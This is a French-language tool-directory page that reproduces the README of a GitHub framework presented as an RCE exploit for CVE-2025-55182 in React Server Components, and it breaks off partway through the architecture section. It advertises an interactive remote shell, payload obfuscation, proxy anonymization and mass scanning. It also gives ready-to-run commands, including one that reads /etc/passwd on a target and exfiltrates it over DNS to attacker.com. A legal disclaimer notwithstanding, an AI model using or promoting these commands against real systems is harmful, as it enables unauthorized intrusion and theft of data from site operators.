Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/cerberusmrxi/cve-2025-55182-advanced-react-server-components-rce-exploit
ReconnaissanceScanners de VulnérabilitésExploitationExploitation d'Applications WebExfiltration de DonnéesContournement de WAFTests d'IntrusionOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubcerberusmrxi/cve-2025-55182-advanced-react-server-components-rce-exploit

CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit

Scanner RCE avancé pour React Server Components ciblant CVE-2025-55182. Fonctionnalités : fingerprinting multi-étapes, vérification de vulnérabilité, exfiltration DNS, shell interactif, obfuscation de payload et reporting professionnel (JSON/HTML/PDF). Tests autorisés uniquement.

Voir le dépôt
134il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🔐 ReactRCE-Scanner

CVE-2025-55182 — Framework avancé d'exploitation et d'évaluation RCE pour React Server Components

Version CVE CVSS Python License

Author PRs Welcome Downloads


📑 Table des matières

  • Avertissement juridique et éthique

  • Présentation

  • Capacités clés

  • Guide de démarrage rapide

  • Architecture et analyse approfondie des fonctionnalités

  • Référence de configuration

  • Suite de tests automatisés

  • Remédiation et atténuation

  • Contribution et communauté

  • Références

  • Licence et auteur


⚠️ Avertissement juridique et éthique

**Cet outil est conçu exclusivement à des fins ÉDUCATIVES et de TESTS DE SÉCURITÉ AUTORISÉS.**L'utilisation non autorisée de ce logiciel contre des cibles sans consentement écrit préalable constitue une violation des lois internationales sur la cybercriminalité, notamment le Computer Fraud and Abuse Act (CFAA), les exigences du RGPD et les conditions d'utilisation standard. L'auteur et les contributeurs déclinent toute responsabilité pour tout usage abusif, opération illégale ou dommage consécutif résultant de ce programme.Utilisez ce programme strictement à vos propres risques.


📋 Présentation

ReactRCE-Scanner est un framework d'évaluation et de vérification de sécurité de niveau entreprise, conçu spécifiquement pour CVE-2025-55182 [1], une vulnérabilité critique d'exécution de code à distance (RCE) affectant les React Server Components dans les versions 19.0.0 à 19.2.0.

Le framework comble le fossé entre la recherche théorique sur les vulnérabilités et la validation pratique de la sécurité. En intégrant l'empreinte multi-étapes, une réduction rigoureuse des faux positifs, une obfuscation avancée des payloads et une génération automatisée de rapports multi-formats, il offre aux ingénieurs en sécurité des capacités de diagnostic précises.

UtilisationRésultats de scan

🎯 Capacités clés

Catégorie de fonctionnalitéPoint fort de l'implémentationStatut opérationnel
Empreinte intelligenteDétection multi-sources du framework et de la version avec algorithmes de scoring de confiance.✅
Vérification multi-étapesPipeline de validation en 5 étapes conçu pour éliminer systématiquement les faux positifs.✅
Génération de payloadsGénérateur de payloads obfusqués prenant en charge l'exfiltration DNS et le multi-encodage.✅
Shell interactifExécution de commandes pseudo-interactive en temps réel et accès shell sur les cibles vérifiées.✅
Rapports completsGénération automatisée de rapports aux formats JSON, HTML, PDF et Markdown.✅
Exfiltration DNSExfiltration hors bande de la sortie des commandes via une gestion sécurisée des requêtes DNS.✅
Moteur de concurrenceArchitecture de scan multi-thread haute performance pour les grandes surfaces d'attaque.✅
Intégration de proxyPrise en charge des proxys HTTP/HTTPS et SOCKS pour un trafic d'évaluation anonymisé.✅

🚀 Guide de démarrage rapide

Installation

Clonez le dépôt et initialisez l'environnement à l'aide du script de configuration automatisé ou d'une installation manuelle des dépendances :

# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit.git
cd CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit

# Configure execution permissions and run setup script
chmod +x setup.sh
./setup.sh

# Alternatively, install core Python dependencies manually
pip install -r requirements.txt

Référence des commandes de base

Le framework fonctionne via une architecture CLI modulaire prenant en charge la validation d'une cible unique, le scan en masse à partir de listes de fichiers, le lancement de shells interactifs et la génération de rapports de conformité.

# 1. Perform a vulnerability scan against a single target
python exploit.py -t https://target.com -m scan

# 2. Execute bulk scans from a target list with JSON export
python exploit.py -f targets.txt -m scan -o report.json

# 3. Execute a single command on a verified vulnerable endpoint
python exploit.py -t https://target.com -m exploit -c "whoami"

# 4. Initiate an interactive remote shell session
python exploit.py -t https://target.com -m shell

# 5. Execute commands with out-of-band DNS exfiltration
python exploit.py -t https://target.com -m exploit -c "cat /etc/passwd" -d attacker.com

# 6. Compile a professional executive assessment report in PDF format
python exploit.py -f targets.txt -o assessment_report.pdf --format pdf

🔬 Architecture et analyse approfondie des fonctionnalités

1. Moteur d'empreinte intelligente

Le framework effectue une reconnaissance approfondie avant la livraison du payload. Il analyse plusieurs champs d'en-tête HTTP (X-Powered-By, Next-Action, RSC ), les balises méta structurelles HTML (data-reactroot, __NEXT_DATA__), les ressources de build statiques et les bundles source JavaScript [2] [3].

Les scores de confiance sont classés en quatre niveaux :

  • CRITIQUE (95 %+) : Plusieurs indicateurs orthogonaux confirment des versions vulnérables du runtime React Server Component.

  • ÉLEVÉ (75–95 %) : Indicateurs structurels forts identifiés avec correspondance exacte de version.

  • MOYEN (50–75 %) : Marqueurs partiels du framework présents ; vérification manuelle requise.

  • FAIBLE (<50 %) : Heuristiques faibles détectées ; probabilité élevée de faux positif.

2. Workflow de vérification multi-étapes

Télécharger l’outil